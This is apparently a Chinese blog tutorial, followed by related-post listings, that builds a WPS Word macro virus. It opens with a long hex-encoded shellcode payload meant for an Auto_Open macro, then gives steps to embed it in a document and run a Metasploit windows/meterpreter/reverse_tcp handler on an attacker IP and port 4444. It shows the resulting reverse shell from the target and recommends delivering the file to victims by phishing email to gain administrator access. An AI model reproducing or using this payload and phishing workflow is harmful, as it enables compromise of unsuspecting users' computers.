00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2C&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H54&H30&H00&H00&H38&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H9C&H00&H45&H78&H69&H74&H50&H72&H6F&H63&H65&H73&H73&H00&H00&H00&H00&H30&H00&H00&H4B&H45&H52&H4E&H45&H4C&H33&H32&H2E&H64&H6C&H6C&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H58&H6E&H45&H66&H52&HA3&HDA&H2C&H7D&HB6&H7B&H67&H83&H36&HF7&H2F&H31&H96&HF7&H89&HE7&H86&H4C&H98&H40&H4A&HC0&H25&H23&H0E&HA4&H3C&HEB&H72&H98&HED&H38&HCD&H18&H5B&H51&HAC&HD2&H95&H9A&H92&HD8

使用WPS Word将上图所示 两个部分制作成可以使用的宏文件。进入装有WPS Office的Windows系统的靶机,然后打开WPS 2019,单击“开发工具”,接着在工具栏单击“宏”,就会弹出一个“宏”对话框,如下图所示:
在这里插入图片描述
起一个宏名,然后单击“创建”按钮,打开宏编辑界面,将我们在Kali 中生成的第一部分,也就是包括Auto_Open在内的几个函数复制到Normal-NewMacros中,覆盖原来的内容。如下图所示:
在这里插入图片描述
在WPS Word操作界面中,粘贴在KaliLinux中生成的第二部分,也就是字符形式的攻击载荷部分,如下图所示:
在这里插入图片描述
然后将构造好的宏病毒文件另存为宏可用文件。
在这里插入图片描述
然后再kali端启动metasploit,启动和设置payload并执行,命令如下:

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
.....
msf6 exploit(multi/handler) > set lhost 192.168. 59.128
.....
msf6 exploit(multi/handler) > set lport 4444
.....
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.59.128:4444

攻击机ip:192.168.59.128
反弹Shell端口:4444
在这里插入图片描述
然后在靶机上双击打开木马文件,结果如下:
Kali已经接收到win7反弹回连得shell:
在这里插入图片描述
键入shell得到win7的命令行
在这里插入图片描述
将该宏病毒文件通过邮件钓鱼等方式发送给目标,一旦目标打开该文件即可拿到其的管理员权限和shell,并进行下一步操作。

参考链接

  1. https://jl-zhenlaixiaowei.blog.youkuaiyun.com/article/details/124770692
  2. https://mp.weixin.qq.com/s/j1Sn7_Yi4W_XVGT2rLIzyg
  3. https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis

欢迎指正交流!!

使用宏病毒反弹shell
qq_42671480的博客
05-23 987
宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。那么,宏病毒是如何产生的呢? 准备环境 kali 攻击机 win7 靶机 生成payload 使用kali虚拟机,输入以下...
遭遇Excel的宏病毒
cuichan3604的博客
04-29 661
朋友的一台电脑,打开任何Excel(Office2003版本)都会弹出两个Excel文档,一个是希望打开的文档,另一个是:startup.xls 看startup.xls的内容,马上意识到中了病毒了.(看这个startup,貌...
office宏病毒
落酒家
09-24 687
office宏病毒是指一种通过Office软件进行传播的恶意软件,它会在你的文档中插入恶意代码,窃取你的个人信息,甚至控制你的计算机。首先,你需要使用最新的防病毒软件,并确保其已更新到最新版本。其次,当你在使用Office软件时,需要特别注意不要打开未知来源的文档,尤其是那些带有宏的文档。
反弹Shell攻击
k_a_elw的博客
11-18 1391
反弹Shell攻击 什么是 一般的正向攻击:攻击服务器链接目标(e.g. 远程桌面、ssh、web服务、telnet…) 反弹:受害者主机主动链接攻击服务器 为什么 正向攻击不能实现 目标在局域网内 目标ip动态变化 目标防火墙:只能发出请求,不能接受 病毒木马等 不清楚对方开机和网络情况 怎么做 让目标服务器下载bash到主机 让目标运行bash bash 让服务器连接至攻击主机 ...
宏病毒实验
W_seventeen的博客
03-25 6141
简单的宏病毒 打开word文档,打开一个word 文档,然后按Alt+F11 调用宏编写窗口(或从工具->宏->Visual Basic->宏编辑器),定义宏名为一个自动宏。单击“创建”按钮,进入VB编辑状态,输入内容如下: Sub AutoOpen() ’ 'AutoOpen Macro Selection.TypeText Text:=“非常简单的宏病毒实例” End S...
预防宏病毒
毒来毒往
02-03 397
   一、验证是否感染宏病毒 打开要检查的文档,单击文件菜单另存为命令,如果对话框中的保存类型为“文档模板”则表示这个文件已经感染了宏病毒,需要杀毒。   二、拒绝宏病毒入侵:   因为宏病毒在word中寄的文件就是normal.dot所以预防它也很简单,只要设置normal.dot文件为只读属性就可以让病毒吃闭门羹了。但当然这也不是万能的,如果病毒制造者注意到这一点,在侵入前先修改你的文件...
WPS2019宏插件 WPS宏功能启用 WPS无法使用宏功能
12-08
标题 "WPS2019宏插件 WPS宏功能启用 WPS无法使用宏功能" 涉及到的是在WPS Office 2019中启用和使用宏功能的过程。宏是WPS Office中一种强大的自动化工具,允许用户编写自定义的VBA(Visual Basic for Applications)...
WPS Office JS宏实现批量处理Word中的标题和正文的样式
觉醒法师的专栏
12-05 4924
该篇讲解word文档中的标题和正文批量修改样式,使用ActiveDocument.Paragraphs获取段落信息。
wps启用宏,wps vba 安装包,wps2021可用
07-03
标题“wps启用宏,wps vba 安装包,wps2021可用”表明我们讨论的是如何在WPS Office 2021版本中启用和使用宏,以及安装VBA(Visual Basic for Applications)环境,VBA是实现宏编程的语言。 描述中的内容简洁明了,...
WPS Office JS宏实现批量处理Word中的表格样式
觉醒法师的专栏
11-27 1万+
WPS Office JS宏,实现Word表格样式批量修改。 由于本职工作原因,经常会用到office办公软件,经常很多内容审批后,需要统一修改内容或样式,如果Word文档中有上百页或上千页,则一个一个修改太麻烦了。在接触到WPSJS宏后,发现工作效率大大提升;如果你会前端开发,有JS基础上手会非常快;如果有VBA基础,就更得心应手了,因为对象和函数定义,基础是沿用office的VBA。其他不多说了,先和大家分享下如果统一修改表格样式。
WPS office综合诊断修复工具
08-14
WPS Office是一款流行的办公软件套装,它包含了文字处理、电子表格、演示文稿等多种功能,类似于微软的Office。然而,用户在使用过程中可能会遇到各种问题,如程序崩溃、默认格式设置异常或注册表错误等。为了解决...
MSF利用宏病毒感染word文档获取shell复现
永远是少年
06-14 2862
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF利用宏病毒感染word文档获取shell复现。 一、环境准备 二、宏文档生成 三、效果检验
Office宏病毒防范与清理指南
最新发布
weixin_31715353的博客
10-09 1870
本文还有配套的精品资源,点击获取 简介:Office宏病毒是通过Microsoft Office软件宏功能传播的恶意软件,能够导致数据丢失、系统瘫痪。本文介绍了防范措施和清理方法,包括软件更新、宏禁用、使用专业反病毒软件,以及用户教育和安全策略的重要性。通过安装"Office病毒专杀"工具,用户可以提升系统对宏病毒的防护能力,同时应采取多层防线确保安全。 1. O...
宏病毒复现
qq_23066945的博客
11-09 1163
宏病毒复现 1、简单讲讲宏病毒 百度:宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。 运行成功能够直接getshell 2、msf生成宏病毒 msfvenom -p w...
office宏病毒反弹shell实验
AFCC_的博客(Web_Dog)
12-10 1275
0x00 什么是宏病毒 宏病毒就是Word中被嵌入的带有恶意行为的宏代码(VBA代码),当打开带有宏病毒word文档时,嵌入其中的宏代码会自动运行 Word 将下列名称识别为自动宏,或称“auto”宏,当相应动作被执行,会自动调用满足条件的VBA代码。 AutoExec:启动 Word 或加载全局模板时 AutoNew:每次新建文档时 AutoOpen:每次打开已有文档时 ...
360杀毒4.0版Office宏病毒免疫体验
黄沙百战穿金甲,不破楼兰终不还。
10-06 2129
现在,很多“办公族”喜欢到网上下载各种Word、Excel、PPT模板来简化自己的工作,但需要警惕的是,这类模板有些会携带“Office宏病毒”,一旦感染,电脑中的其他文件也可能遭殃,严重性影响日常工作。听说360杀毒4.0新版具备超强的“Office宏病毒免疫”功能,接下来让我们亲自体验一下吧。   与旧版相比360杀毒4.0新版的“Office宏病毒”免疫功能开启/关闭按钮被直接设置到了
excel提示宏病毒处理
热门推荐
YJlio的博客
09-10 4万+
excel提示宏病毒如何解决?
office宏攻击
LainWith的博客
12-12 2685
开启宏创建宏CS创建监听器生成宏代码 思路:CS生成宏病毒插入到office中 开启宏 启动office,选项->自定义功能区->开发工具 创建宏 先创建一个宏,然后进入vb代码编写界面 CS 创建监听器 生成宏代码 ...
恶意代码实验3:Word宏病毒实验
qq_63949327的博客
11-21 4581
只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。回答不正确三次,即可自动跳出病毒程序,但那时已经出现几十个文档。1、打开的宏编辑器如图所示,即可编写病毒代码。
WPS VBA宏插件:扩展Office自动化能力
4. WPS与VBA的兼容性问题:WPS Office与Microsoft Office之间存在一定的兼容性差异,尽管WPS努力实现Office的兼容,但某些复杂的VBA宏可能在WPS中无法完美运行。用户在移植Microsoft Office的VBA宏到WPS时需要注意...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值